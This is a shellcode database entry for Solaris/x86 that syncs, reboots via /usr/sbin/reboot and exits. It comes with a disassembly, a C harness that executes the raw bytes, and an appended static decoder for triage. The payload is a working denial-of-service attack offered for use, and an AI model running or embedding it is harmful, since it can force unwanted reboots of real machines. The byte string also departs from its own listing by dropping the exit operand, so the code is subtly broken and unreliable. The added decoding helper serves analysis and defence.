# Title : Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
# Published : 2010-06-14
# Author : Jonathan Salwan
/*
Title: Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
Author: Jonathan Salwan <submit AT shell-storm.org>
Web: http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
! Database of shellcodes: http://www.shell-storm.org/shellcode/
Date: 2010-06-07
Tested: SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris
0x8048074: 31 c0            xorl  %eax,%eax        ; eax = 0
0x8048076: b0 24            movb  $0x24,%al        ; syscall 0x24 (sync)
0x8048078: cd 91            int   $0x91            ; Solaris x86 system call trap
0x804807a: 31 c0            xorl  %eax,%eax        ; eax = 0 again
0x804807c: 50               pushl %eax             ; string terminator
0x804807d: 68 62 6f 6f 74   pushl $0x746f6f62      ; "boot"
0x8048082: 68 6e 2f 72 65   pushl $0x65722f6e      ; "n/re"
0x8048087: 68 2f 73 62 69   pushl $0x6962732f      ; "/sbi"
0x804808c: 68 2f 75 73 72   pushl $0x7273752f      ; "/usr"
0x8048091: 89 e3            movl  %esp,%ebx        ; ebx -> "/usr/sbin/reboot"
0x8048093: 50               pushl %eax             ; argv[1] = NULL
0x8048094: 53               pushl %ebx             ; argv[0] = path
0x8048095: 89 e1            movl  %esp,%ecx        ; ecx -> argv
0x8048097: 50               pushl %eax             ; NULL
0x8048098: 51               pushl %ecx             ; argv
0x8048099: 53               pushl %ebx             ; path
0x804809a: b0 0b            movb  $0xb,%al         ; syscall 0x0b, runs the path built above
0x804809c: 50               pushl %eax             ; placeholder in the return-address slot
0x804809d: cd 91            int   $0x91
0x804809f: 31 db            xorl  %ebx,%ebx
0x80480a1: b0 01            movb  $0x1,%al         ; syscall 0x01 (exit)
0x80480a3: cd 91            int   $0x91
*/
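#include <stdio.h>
#include <string.h>

/* The listing above ends with b0 01 cd 91; the string below has b0 cd 91
   (the 01 operand is absent), which gives the 48 bytes in the title. */
char sc[] = "\x31\xc0\xb0\x24\xcd\x91\x31\xc0\x50\x68"
            "\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65\x68"
            "\x2f\x73\x62\x69\x68\x2f\x75\x73\x72\x89"
            "\xe3\x50\x53\x89\xe1\x50\x51\x53\xb0\x0b"
            "\x50\xcd\x91\x31\xdb\xb0\xcd\x91";

int main(void)
{
    /* Print the payload length, then jump to the byte array. */
    fprintf(stdout, "Length: %zu\n", strlen(sc));
    (*(void (*)()) sc)();
    return 0;
}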
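
For triage, the four `pushl` immediates in the listing can be decoded statically to recover the path the payload hands to the kernel, without running anything. This is an added example, not part of the original entry; `recover_stack_string` and `printable_push` are hypothetical helper names, and the byte array is copied from the listing at 0x804807a through 0x8048092.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Bytes 0x804807a..0x8048092 copied from the listing above. */
static const unsigned char listing[] = {
    0x31, 0xc0, 0x50, 0x68, 0x62, 0x6f, 0x6f, 0x74, 0x68, 0x6e, 0x2f, 0x72,
    0x65, 0x68, 0x2f, 0x73, 0x62, 0x69, 0x68, 0x2f, 0x75, 0x73, 0x72, 0x89, 0xe3
};

/* True if p points at "push imm32" (opcode 0x68) with four printable bytes. */
static int printable_push(const unsigned char *p)
{
    if (p[0] != 0x68) return 0;
    for (int j = 1; j <= 4; j++)
        if (!isprint(p[j])) return 0;
    return 1;
}

/* Find the longest run of back-to-back printable pushes and rebuild the
 * string as it lies in memory: the stack grows down, so the last dword
 * pushed comes first. Heuristic byte scan, not a disassembler.
 * Returns the string length, or 0 if nothing fits. */
size_t recover_stack_string(const unsigned char *code, size_t len,
                            char *out, size_t outsz)
{
    size_t best = 0, best_n = 0, w = 0;
    for (size_t i = 0; i + 5 <= len; ) {
        size_t n = 0;
        while (i + 5 * (n + 1) <= len && printable_push(code + i + 5 * n))
            n++;
        if (n > best_n) { best_n = n; best = i; }
        i += n ? 5 * n : 1;
    }
    if (best_n == 0 || best_n * 4 + 1 > outsz) return 0;
    for (size_t k = best_n; k-- > 0; w += 4)
        memcpy(out + w, code + best + 5 * k + 1, 4);
    out[w] = '\0';
    return w;
}

int main(void)
{
    char path[64];
    if (recover_stack_string(listing, sizeof listing, path, sizeof path))
        printf("stack string: %s\n", path);
    return 0;
}
```

Because the scan matches raw bytes, a 0x68 that is really an operand of another instruction can produce a false run; treat the output as a lead to confirm in a disassembler.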